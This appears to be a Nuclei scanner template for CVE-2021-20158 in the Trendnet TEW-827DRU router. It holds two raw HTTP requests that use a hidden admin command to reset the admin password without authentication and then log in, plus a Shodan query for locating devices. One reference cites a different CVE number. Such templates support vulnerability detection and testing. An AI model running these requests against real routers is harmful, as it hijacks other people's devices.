id: CVE-2021-20158 info: name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change author: gy741 severity: critical description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command. remediation: | Upgrade to the latest firmware version provided by Trendnet to fix the vulnerability. reference: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-20158 cwe-id: CWE-306 epss-score: 0.01211 epss-percentile: 0.83693 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 2 vendor: trendnet product: tew-827dru_firmware shodan-query: http.html:"TEW-827DRU" tags: disclosure,router,intrusive,tenable,cve,cve2021,trendnet variables: password: "{{rand_base(6)}}" http: - raw: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}} - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id= matchers-condition: and matchers: - type: word part: body words: - 'setConnectDevice' - 'setInternet' - 'setWlanSSID' - 'TEW-827DRU' condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4b0a00483046022100950ebf347597e70c829dddacf67c28c8ba9b5880214d22e9240eff418c1f7840022100f3a0c92dcec3875ccfbdad35632d9ac055a21e5ef7d2434880e3c7b86a3db7ba:922c64590222798bb761d5b6d8e72950